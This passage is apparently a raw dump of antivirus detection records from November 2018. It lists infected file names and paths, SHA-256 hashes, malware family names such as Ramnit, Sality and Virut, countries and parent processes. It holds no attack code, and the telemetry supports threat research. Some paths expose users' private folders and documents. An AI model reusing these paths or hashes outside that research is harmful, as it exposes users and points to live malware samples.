  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.8.8\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='ab3f7ac8daf2d7af65fbbf61020a84cef933e64802d2a280a68b59a59645adf6', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e506c79fa9a81b18447491dce61b73ca58bf3aaecf77dec247601ce2752e2c0a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\E506C79FA9A81B18447491DCE61B73CA58BF3AAECF77DEC247601CE2752E2C0A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e506c79fa9a81b18447491dce61b73ca58bf3aaecf77dec247601ce2752e2c0a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:11:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='koperasi.exe', filepath='D:\\pindahan\\Pembukuan\\KSP\\Software Koperasi 3in1-160509\\Koperasi.exe', filesize=25088000, name='W32/Sality.AT.#M1.#R1'), hash='f29ab66293b3aaf5507945d4bf7521644b58baa8fe0d6dadabf3ddb3d4a33f01', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ndp46-kb3045560-web.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045560-Web.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='b5f1fddc646129d18881165e61a34decbf12ac8274a756119958ca55f91f4c4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114755-b0bb359c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_474aba85\\AVSCAN-20181102-114542-999D7883\\AVSCAN-20181102-114755-B0BB359C', filesize=896000, name='HEUR/AGEN.1011092.#M1.#R1'), hash='f5ad2f8f9231e34a64cdfb5dbb2a3b294e0d53857a5f0fa94c0cce2bfc15bbc7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:48:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\kclpxtmypku\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rade7b36.tmp.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rade7b36.tmp.exe', filesize=192000, name='TR/Crypt.XPACK.e87980.#M1.#R1'), hash='e8798066963ce3a5509ca6f1e940b83983e14fe41726a279e7e868b4d274d344', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-02T09:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082713-84c3352e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-082615-784E182D\\AVSCAN-20181102-082713-84C3352E', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='анкета на 2017 год.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкета на 2017 год.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:51:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='689342.exe', filepath='D:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T18:40:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274010001.scr', filepath='F:\\scan-peta-wb-sp2010\\3274010\\3274010001\\3274010001.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:03:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='9f6d6c0063f087f81bcc75f7bcf906a0a2da0e05c65462165eeaf8a48deb5a32', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:57:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110836-cd39593c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110836-CD39593C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023904e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023904e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='af2d5b939fe28fb9cba8536cf9a07f753fac6e2ca0dada4d70cceab647f286be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\AF2D5B939FE28FB9CBA8536CF9A07F753FAC6E2CA0DADA4D70CCEAB647F286BE', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R544'), hash='af2d5b939fe28fb9cba8536cf9a07f753fac6e2ca0dada4d70cceab647f286be', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x86.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='b3aa91b8a34ce2c8173512d0d09d7c4429849008c80b7ffbdbcda38ecbaf4cf9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029524b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029524b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:58:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239d1e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239d1e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:48:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238c51', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238c51', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:30:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002916a8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002916a8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:52:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023edfc', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023edfc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:09:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c90a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c90a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:36:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002389ba', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002389ba', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002921e3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002921e3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:05:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-011055-65b1456a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_abacec2e\\AVSCAN-20181105-010551-2D0A8DFE\\AVSCAN-20181105-011055-65B1456A', filesize=25988000, name='TR/Taranis.1662.#M1.#R1'), hash='fd1153e162ed6c17fde6ca84c67d8600a63673c5771087b541b88f6fa3201155', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:10:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webdbg.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Tools\\WebDbg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f59808154fc19bdae8d213c379265e5c61c08e477f9fbaea9203eeeb522d70c9', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:08:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:03:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T06:17:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F37BD445FF5707DF09E0AD9FB4E0150A45A26785690BB7DE4639D56D4B486D79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f37bd445ff5707df09e0ad9fb4e0150a45a26785690bb7de4639d56d4b486d79', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8муз.exe', filepath='E:\\муз\\8муз.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='f5712cd3636de516c2f73ce05ffdd34b663dcb28fa2a0e85d275d83d09e29f8c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T06:11:00Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:46:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:04:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aka,akp.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\DANA AKA,AKP\\AKA,AKP.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfl70.dll', filepath='l:\\PDFL70.dll', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='22079ca0f23065189fc6d4db21f99b6153fe271a3ab8cf87709ac18ee35fa283', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2012.pif', filepath='D:\\DOKUMENKU\\GABUNG KREDIT\\2012\\2012.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4fd9f6e641bc60321cd6e112db479de9aa2041a6df7baf499f93307d4ccb87ad', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T13:29:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160131-f72af5b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160131-F72AF5B1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='opp.dll', filepath='C:\\Program Files\\Adobe\\Photoshop 7.0\\OPP.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='0bb16306af5bbf20eb70837f37f1dd784dd4fee20be7729c81ffdf9289cb7f0d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T02:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150031-e3b9bebb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d7dcb6\\AVSCAN-20181102-145232-7F982004\\AVSCAN-20181102-150031-E3B9BEBB', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1379543\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\CorelDRAW X6 Full Version_4013876236.exe', parentsize=2409021, timestamp='2018-11-02T09:20:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='export.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\FusionCharts\\export\\export.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211235-d30021f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211235-D30021F5', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:12:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP908~1\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start_coin.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\START_COIN\\START_COIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-192857-dcbba80d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03d723a3\\AVSCAN-20181101-191322-758FF685\\AVSCAN-20181101-192857-DCBBA80D', filesize=7872000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='3640d6a3517401d2d33b731a1eb03c16559f3d56a60917dc6d4fc308dd14205b', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:28:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\2.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T05:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5a835e53fb26d7d23cb817037d5497074a2a77677175b064871bf00c40cbe172', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\5A835E53FB26D7D23CB817037D5497074A2A77677175B064871BF00C40CBE172', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5a835e53fb26d7d23cb817037d5497074a2a77677175b064871bf00c40cbe172', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:13Z'), dt=datetime.date(2018, 11, 2)),
